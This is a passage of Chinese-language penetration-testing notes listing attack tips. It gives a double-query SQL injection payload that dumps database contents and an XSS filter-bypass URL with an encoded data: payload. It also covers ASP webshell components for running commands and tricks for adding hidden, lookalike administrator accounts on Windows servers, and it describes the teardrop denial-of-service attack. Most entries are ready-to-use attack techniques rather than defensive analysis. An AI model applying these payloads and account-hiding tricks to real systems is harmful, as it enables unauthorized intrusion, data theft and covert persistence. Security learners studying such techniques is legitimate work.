询结果。如果页面不存在漏洞,则该语句将会很快执行完。——摘自《白帽子讲Web安全》吴翰清
18. 双查询注入核心语
php?id=-1 union select 1 from (select+count(*),concat(floor(rand(0)*2),( 注入爆数据语句))a from information_schema.tables group by a)b
【渗透笔记】(叁)
1. 提权简单归纳一下,可以分为系统设置与第三方软件缺陷提权、溢出提权、社会工程学
提权。
2. asp webshell想要执行cmd命令,需要具备一起其中任一个组件:wscript.shell、
wscript.shell1、shell applition、shell applition1
3. 有时候添加账号没成功可能是服务器的强密码策略(万恶的2008),改个超强度的密码
再往死里整吧。
4. 有时候能够添加用户,但是不能添加管理员组,这时候考虑是不是管理员组被改名了。
可以利用net user administrator查看管理员所属的组来确定名称。
5. 添加账号一个小小技巧,妙用无限:在添加账号时,将账号名设为“ ”(引号里的字
符为搜狗拼音打v+1时候的d项),不懂什么意思,net user一下你就知道这个淫荡的技巧了。
6. <strong>7、</strong>XSS绕绕绕2:
search?str=xxxx%3Ca%20href=%22data:text/html;%26%230000000000000000098ase64%26%230000000000000044%20PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==%22%3Etest%3C/a%3E
缺陷参数:str
7. 过滤规则够BT 但是同样能绕!
会把提交的编码 给解码 然后再插入到网页中!然后再对网页内的值进行检查 过滤! base64 --< %26%230000000000000000098ase64
首先%26%23会被还原成 &# 于是变成了: b 于是被还原成:b,b插入到页面 再检查 b+ase64 = base64 满足规则 于是又过滤成 base64 绕过失败!但是如果b的html十进制编码 再多加几个000 便不会被他给解码 但是在浏览器中又会被解码 于是便可以这样绕过!——摘自《XSS神器]XssEncode chrome插件 – 0x_Jin》
8. 8、泪滴攻击是拒绝服务攻击的一种。 泪滴是一个特殊构造的应用程序,通过发送伪造
的相互重叠的IP分组数据包,使其难以被接收主机重新组合。他们通常会导致目标主机内核失措 。 泪滴攻击利用IP分组数据包重叠造成TCP/ IP分片重组代码不能恰当处理IP包。影响的系统有Windows 3.1、Windows 95和NT、2.0.32和2.1.63版本以下的Linux。